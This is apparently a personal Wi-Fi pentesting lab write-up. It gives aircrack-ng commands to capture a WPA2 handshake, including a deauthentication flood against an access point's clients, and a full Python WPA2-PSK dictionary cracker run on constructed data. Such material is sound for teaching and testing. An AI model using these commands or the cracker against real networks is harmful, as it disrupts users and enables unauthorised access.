- Bash
- Python
- Aircrack-ng Suite
- Wireshark
- Alfa AWUS036ACH wireless adapter
- Set up a Wi-Fi pentesting environment
- Capture WPA2 handshake packets
- Attempt password cracking using dictionary attacks
- Document methodology and personal insights
Run the "iw dev" command to list the available Wi-Fi interfaces. In my example the interface is wlan0, and the "type managed" line in the output shows that the adapter is still in managed mode:

Run the "sudo airmon-ng check kill" command. "check kill" stops processes such as NetworkManager and wpa_supplicant that would otherwise interfere with the aircrack-ng suite (for example by switching the interface back to managed mode or changing its channel):

Run the "sudo airmon-ng start wlan0" command. This switches the interface from managed mode to monitor mode; airmon-ng creates a monitor interface, in my case named wlan0mon:

Run the "sudo airodump-ng wlan0mon" command to show all the access points (and the clients associated with them) that the adapter can hear:

Breakdown of the output above:

Run the command "sudo airodump-ng --bssid <AP MAC> -c <channel> -w captures wlan0mon". This locks the adapter to the access point's channel and writes the 802.11 frames from the specified MAC address to a file named captures-01.cap. airodump-ng gives no indication of a handshake until one has actually been captured; at that point "WPA handshake: <AP MAC>" appears in the top-right corner of its header:


In a second terminal, while airodump-ng keeps capturing, run the command "sudo aireplay-ng --deauth 0 -a <AP MAC> wlan0mon". This sends deauthentication frames to all clients of the specified access point. A count of 0 means aireplay-ng keeps sending them until it is stopped with Ctrl+C, so a small count such as "--deauth 5" is usually enough and is less disruptive:

When a client reconnects to the target access point, the 4-way handshake is captured and airodump-ng shows "WPA handshake: <AP MAC>" in its header:

Run the "wireshark captures-01.cap" command to open the captures-01.cap file in Wireshark:

In Wireshark we want to enter "eapol" as the display filter to see only the 4-way handshake frames for Wi-Fi connections. Message 1 of 4 carries the access point's ANonce, and message 2 of 4 carries the client's SNonce together with a MIC computed from the key derived from the passphrase. Those two messages are what a dictionary attack needs: for each candidate passphrase it derives the keys, recomputes the MIC over message 2 and compares it to the captured one:

Run the "sudo airmon-ng stop wlan0mon" command to put the Wi-Fi adapter back into managed mode:

Run the "sudo gzip -d /usr/share/wordlists/rockyou.txt.gz" command to decompress the wordlist (rockyou.txt ships gzipped on Kali) that will be used to crack the Wi-Fi password:
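To show what a tool like aircrack-ng actually does with the captured message 2, here is an added example (not part of the original writeup and not aircrack-ng's own code) that implements the WPA2-PSK dictionary attack from scratch: PBKDF2 to derive the PMK from a candidate passphrase, the 802.11i PRF-512 to derive the PTK, and an HMAC over the EAPOL-Key frame to recompute the MIC. It also classifies EAPOL-Key frames into messages 1 to 4 from their Key Information flags, which is what Wireshark's "eapol" view shows. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed values; no real capture is used, so the sample message 2 is built in the block itself.

```python
import hashlib
import hmac
import struct

# Key Information flag bits from IEEE 802.11i (EAPOL-Key frame, RSN descriptor).
KEY_INFO_PAIRWISE = 0x0008
KEY_INFO_INSTALL = 0x0040
KEY_INFO_ACK = 0x0080
KEY_INFO_MIC = 0x0100
KEY_INFO_SECURE = 0x0200
# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4 (EAPOL header) + 1 desc + 2 key info + 2 key len + 8 replay + 32 nonce + 16 IV + 8 RSC + 8 ID.
MIC_OFFSET = 81


def handshake_message_number(key_info):
    """Return 1-4 for a 4-way handshake EAPOL-Key frame based on its flags, or None."""
    ack = bool(key_info & KEY_INFO_ACK)
    mic = bool(key_info & KEY_INFO_MIC)
    install = bool(key_info & KEY_INFO_INSTALL)
    secure = bool(key_info & KEY_INFO_SECURE)
    if ack and not mic:
        return 1          # AP -> STA: ANonce, no MIC yet
    if mic and not ack and not secure:
        return 2          # STA -> AP: SNonce + MIC (what the cracker needs)
    if ack and mic and install:
        return 3          # AP -> STA: GTK, install flag
    if mic and not ack and secure:
        return 4          # STA -> AP: confirmation
    return None


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(pmk, ap_mac, sta_mac, anonce, snonce):
    """802.11i PRF-512: PTK from PMK, both MACs and both nonces (sorted byte-wise)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # 4 x 20 bytes of SHA1 output >= 64 bytes
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol_frame, descriptor_version):
    """MIC over the EAPOL-Key frame with the MIC field zeroed; MD5 for v1 (TKIP), SHA1 for v2 (CCMP)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if descriptor_version == 1:
        digestmod = hashlib.md5
    elif descriptor_version == 2:
        digestmod = hashlib.sha1
    else:
        raise ValueError("only key descriptor versions 1 and 2 are handled here")
    return hmac.new(kck, zeroed, digestmod).digest()[:16]


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, m2_frame):
    """Dictionary attack: return the candidate whose derived KCK reproduces the captured M2 MIC."""
    key_info = struct.unpack(">H", m2_frame[5:7])[0]
    version = key_info & 0x0007
    target_mic = m2_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = prf512(pmk, ap_mac, sta_mac, anonce, snonce)[:16]  # KCK is the first 128 bits of the PTK
        if hmac.compare_digest(eapol_mic(kck, m2_frame, version), target_mic):
            return candidate
    return None


def build_eapol_key_frame(key_info, replay_counter, nonce, mic=b"\x00" * 16, key_data=b""):
    """Assemble an EAPOL-Key frame (RSN descriptor type 2, 16-byte key length for CCMP)."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter) + nonce
    body += b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + struct.pack(">H", len(key_data)) + key_data
    return struct.pack(">BBH", 2, 3, len(body)) + body  # EAPOL version 2, type 3 = EAPOL-Key


# Constructed sample "capture" (not real data): a message 2 whose MIC was produced with the true passphrase.
SSID = "TestLab"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "correcthorse"
M2_KEY_INFO = 0x010A  # pairwise | MIC | descriptor version 2


def sample_m2_frame():
    kck = prf512(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_key_frame(M2_KEY_INFO, 1, SNONCE)
    return build_eapol_key_frame(M2_KEY_INFO, 1, SNONCE, mic=eapol_mic(kck, unsigned, 2))


def demo(wordlist=("password", "12345678", "correcthorse", "letmein12")):
    return crack(list(wordlist), SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, sample_m2_frame())


if __name__ == "__main__":
    print("message type of sample frame:", handshake_message_number(M2_KEY_INFO))
    print("recovered passphrase:", demo())
```

The cost of the attack is entirely in pmk_from_passphrase: 4096 PBKDF2 iterations per candidate, and the PMK depends on the SSID, so a precomputed table only helps against a specific network name. Everything after the PMK is cheap, which is why a strong, non-dictionary passphrase is the only defence once a handshake has been captured.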
